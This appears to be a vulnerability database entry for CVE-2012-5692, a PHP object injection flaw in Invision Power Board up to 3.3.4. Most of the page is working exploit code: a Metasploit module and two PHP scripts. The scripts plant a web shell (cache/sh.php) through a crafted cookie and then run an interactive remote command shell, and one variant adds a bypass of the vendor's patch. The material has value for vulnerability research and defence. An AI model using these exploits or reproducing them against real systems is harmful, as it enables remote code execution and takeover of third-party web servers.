Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE Other |
No informations. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 22686
Publication date : 2012-11-12 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution',
'Description' => %q{
This module exploits a php unserialize() vulnerability in Invision IP.Board
<= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary
code under the context of the webserver user.
The dangerous unserialize() exists in the '/admin/sources/base/core.php' script,
which is called with user controlled data from the cookie. The exploit abuses the
__destruct() method from the dbMain class to write arbitrary PHP code to a file on
the Invision IP.Board web directory.
The exploit has been tested successfully on Invision IP.Board 3.3.4.
},
'Author' =>
[
'EgiX', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'sinn3r' # PhpEXE tekniq & check() method
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-5692' ],
[ 'OSVDB', '86702' ],
[ 'BID', '56288' ],
[ 'EDB', '22398' ],
[ 'URL', 'http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 8000, #Apache's limit for GET
'DisableNops' => true
},
'Targets' => [ ['Invision IP.Board 3.3.4', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 25 2012'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/forums/"])
], self.class)
end
def base
base = target_uri.path
base << '/' if base[-1, 1] != '/'
return base
end
def check
res = send_request_raw({'uri'=>"#{base}index.php"})
return Exploit::CheckCode::Unknown if not res
version = res.body.scan(/Community Forum Software by IP\.Board (\d+)\.(\d+).(\d+)/).flatten
version = version.map {|e| e.to_i}
# We only want major version 3
# This version checking is based on OSVDB's info
return Exploit::CheckCode::Safe if version[0] != 3
case version[1]
when 1
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
when 2
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 3)
when 3
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
end
return Exploit::CheckCode::Safe
end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
end
end
end
def exploit
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
# get_write_exec_payload uses a function, which limits our ability to support
# Linux payloads, because that requires a space:
# function my_cmd
# becomes:
# functionmy_cmd #Causes parsing error
# We'll have to address that in the mixin, and then come back to this module
# again later.
php_payload = get_write_exec_payload(:unlink_self=>true)
php_payload = php_payload.gsub(/^\<\?php/, '<?')
php_payload = php_payload.gsub(/ /,'')
db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
'uri' => "#{base}index.php?#{php_payload}",
'method' => 'GET',
'cookie' => "member_id=#{Rex::Text.uri_encode(db_driver_mysql)}"
})
if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}")
return
end
print_status("#{@peer} - Executing the payload #{@upload_php}")
res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})
if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
return
end
end
end
Exploit Database EDB-ID : 22398
Publication date : 2012-10-31 23h00 +00:00
Author : EgiX
EDB Verified : Yes
<?php
/*
----------------------------------------------------------------
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
----------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: http://www.invisionpower.com/
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php
4015. static public function get($name)
4016. {
4017. // Check internal data first
4018. if ( isset( self::$_cookiesSet[ $name ] ) )
4019. {
4020. return self::$_cookiesSet[ $name ];
4021. }
4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
4023. {
4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
4025.
4026. if ( substr( $_value, 0, 2 ) == 'a:' )
4027. {
4028. return unserialize( stripslashes( urldecode( $_value ) ) );
4029. }
The vulnerability is caused due to this method unserialize user input passed through cookies without a proper
sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts
with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a
serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code
via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug
info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this
reason successful exploitation of this vulnerability requires short_open_tag to be enabled.
[-] Disclosure timeline:
[21/10/2012] - Vulnerability discovered
[23/10/2012] - Vendor notified
[25/10/2012] - Patch released: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update
[25/10/2012] - CVE number requested
[29/10/2012] - Assigned CVE-2012-5692
[31/10/2012] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+---------------------------------------------------------------------+";
print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");
while(1)
{
print "\nipb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
Exploit Database EDB-ID : 22547
Publication date : 2012-11-06 23h00 +00:00
Author : webDEViL
EDB Verified : No
<?php
/*
So this is the patch that sanitizes,
static public function safeUnserialize( $serialized )
{
// unserialize will return false for object declared with small cap o
// as well as if there is any ws between O and :
if ( is_string( $serialized ) && strpos( $serialized, "\0" ) === false )
{
if ( strpos( $serialized, 'O:' ) === false )
{
// the easy case, nothing to worry about
// let unserialize do the job
return @unserialize( $serialized );
}
else if ( ! preg_match('/(^|;|{|})O:[0-9]+:"/', $serialized ) )
{
// in case we did have a string with O: in it,
// but it was not a true serialized object
return @unserialize( $serialized );
}
}
return false;
}
And this is what bypasses it ( By @i0n1c )
$payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
Which makes this an IPB 0day. lulz!
- webDEViL
*/
/*
----------------------------------------------------------------
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
----------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: http://www.invisionpower.com/
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php
4015. static public function get($name)
4016. {
4017. // Check internal data first
4018. if ( isset( self::$_cookiesSet[ $name ] ) )
4019. {
4020. return self::$_cookiesSet[ $name ];
4021. }
4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
4023. {
4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
4025.
4026. if ( substr( $_value, 0, 2 ) == 'a:' )
4027. {
4028. return unserialize( stripslashes( urldecode( $_value ) ) );
4029. }
The vulnerability is caused due to this method unserialize user input passed through cookies without a proper
sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts
with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a
serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code
via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug
info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this
reason successful exploitation of this vulnerability requires short_open_tag to be enabled.
[-] Disclosure timeline:
[21/10/2012] - Vulnerability discovered
[23/10/2012] - Vendor notified
[25/10/2012] - Patch released: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update
[25/10/2012] - CVE number requested
[29/10/2012] - Assigned CVE-2012-5692
[31/10/2012] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+-----------------------------------+";
print "\n| Invision Power Board 0day Exploit |";
print "\n+-----------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
# Super bypass by @i0n1c
$payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");
while(1)
{
print "\nipb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
Products Mentioned
Configuraton 0
Invisioncommunity>>Invision_power_board >> Version 3.1.2
Invisioncommunity>>Invision_power_board >> Version 3.3.0
Invisionpower>>Invision_power_board >> Version 3.1.0
Invisionpower>>Invision_power_board >> Version 3.1.1
Invisionpower>>Invision_power_board >> Version 3.1.3
Invisionpower>>Invision_power_board >> Version 3.1.4
Invisionpower>>Invision_power_board >> Version 3.2.0
Invisionpower>>Invision_power_board >> Version 3.2.1
Invisionpower>>Invision_power_board >> Version 3.2.2
References